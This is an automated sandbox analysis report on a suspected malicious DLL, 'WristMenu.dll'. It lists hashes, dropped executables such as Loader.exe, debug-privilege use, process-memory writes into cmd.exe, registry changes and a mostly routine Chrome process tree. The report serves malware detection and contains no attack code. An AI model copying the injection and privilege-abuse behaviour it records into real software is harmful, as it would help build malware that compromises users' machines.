Analysis
-
max time kernel
211s -
max time network
198s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
29/08/2023, 00:16
Static task
static1
Behavioral task
behavioral1
Sample
WristMenu.dll
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
WristMenu.dll
Resource
win10v2004-20230703-en
General
-
Target
WristMenu.dll
-
Size
1.8MB
-
MD5
1cabfe41c910eade4a82cfacbf5e8d06
-
SHA1
9eb17b965576c097719accea35af87c70588bb63
-
SHA256
c05eadb4c81e5c489b56b1c54edde4fd7f787be1a099312fc97e321a3c71af5c
-
SHA512
7c1b09e0badf3bd8cc6b7395e6485a4badac664fbb4960320cb76e11195b7b7fca9e44f0aff3b174b15e5ba34eb97700a1ec496f11c4fa1aabd610e8b38c8f27
-
SSDEEP
12288:pYqXFv/iwEwpGGbBcMLEDAJ0HfSrcSyHlL456F7B5VBFIWzZTbZUiHXaHdiRbj3j:jEDnR/vIW1wiR339YijEJVN/WZN
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 3708 Loader.exe 3716 Gorilla Tag.exe 1140 smi.exe -
Loads dropped DLL 1 IoCs
pid Process 3716 Gorilla Tag.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4000 1140 WerFault.exe 131 -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Gorilla Tag.exe Set value (data) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 0000000001000000ffffffff Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Gorilla Tag.exe Set value (str) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg Gorilla Tag.exe Set value (str) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Gorilla Tag.exe Set value (data) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Gorilla Tag.exe Set value (str) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Gorilla Tag.exe Set value (data) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Gorilla Tag.exe Set value (data) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff Gorilla Tag.exe Set value (data) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Gorilla Tag.exe Set value (data) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Gorilla Tag.exe Set value (data) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 Gorilla Tag.exe Set value (str) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg Gorilla Tag.exe Set value (data) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\NodeSlot = "8" Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 Gorilla Tag.exe Set value (str) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Gorilla Tag.exe Set value (str) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" Gorilla Tag.exe Set value (data) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Gorilla Tag.exe Set value (data) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Gorilla Tag.exe Set value (data) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\MRUListEx = ffffffff Gorilla Tag.exe Set value (int) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Gorilla Tag.exe Set value (str) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Gorilla Tag.exe Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Gorilla Tag.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3716 Gorilla Tag.exe 3716 Gorilla Tag.exe 3708 Loader.exe 1140 smi.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3716 Gorilla Tag.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeRestorePrivilege 4912 7zG.exe Token: 35 4912 7zG.exe Token: SeSecurityPrivilege 4912 7zG.exe Token: SeSecurityPrivilege 4912 7zG.exe Token: SeDebugPrivilege 3708 Loader.exe Token: SeDebugPrivilege 1140 smi.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4912 7zG.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3716 Gorilla Tag.exe 3716 Gorilla Tag.exe 3716 Gorilla Tag.exe 3716 Gorilla Tag.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 3708 wrote to memory of 1404 3708 Loader.exe 126 PID 3708 wrote to memory of 1404 3708 Loader.exe 126 PID 3708 wrote to memory of 1404 3708 Loader.exe 126 PID 1404 wrote to memory of 4516 1404 cmd.exe 128 PID 1404 wrote to memory of 4516 1404 cmd.exe 128 PID 1404 wrote to memory of 4516 1404 cmd.exe 128 PID 3708 wrote to memory of 1872 3708 Loader.exe 129 PID 3708 wrote to memory of 1872 3708 Loader.exe 129 PID 3708 wrote to memory of 1872 3708 Loader.exe 129 PID 1872 wrote to memory of 1140 1872 cmd.exe 131 PID 1872 wrote to memory of 1140 1872 cmd.exe 131 PID 3708 wrote to memory of 2792 3708 Loader.exe 135 PID 3708 wrote to memory of 2792 3708 Loader.exe 135 PID 3708 wrote to memory of 2792 3708 Loader.exe 135
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\WristMenu.dll,#11⤵PID:4468
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc84eb9758,0x7ffc84eb9768,0x7ffc84eb97781⤵PID:2660
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:81⤵PID:856
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:21⤵PID:4584
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2248 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:81⤵PID:4292
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=3028 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:11⤵PID:4656
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=3008 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:11⤵PID:4156
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:444
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --mojo-platform-channel-handle=4588 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:11⤵PID:2904
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:81⤵PID:4556
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4928 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:81⤵PID:2816
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5076 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:81⤵PID:1404
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5224 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:81⤵PID:548
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:81⤵PID:3816
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --mojo-platform-channel-handle=5208 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:11⤵PID:3348
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3032 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:81⤵PID:5024
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --mojo-platform-channel-handle=3080 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:11⤵PID:4596
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:81⤵PID:788
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5464 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:81⤵PID:3612
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5196 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:11⤵PID:2860
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=5820 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:11⤵PID:2268
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3284 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:81⤵PID:1136
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5956 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:81⤵PID:1252
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5404 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:11⤵PID:3352
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2316
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=5684 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:11⤵PID:1340
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:81⤵PID:3960
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --mojo-platform-channel-handle=6596 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:11⤵PID:924
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Quantum\" -ad -an -ai#7zMap3430:76:7zEvent160431⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4912
-
C:\Users\Admin\Downloads\Quantum\Debug\Loader.exe"C:\Users\Admin\Downloads\Quantum\Debug\Loader.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
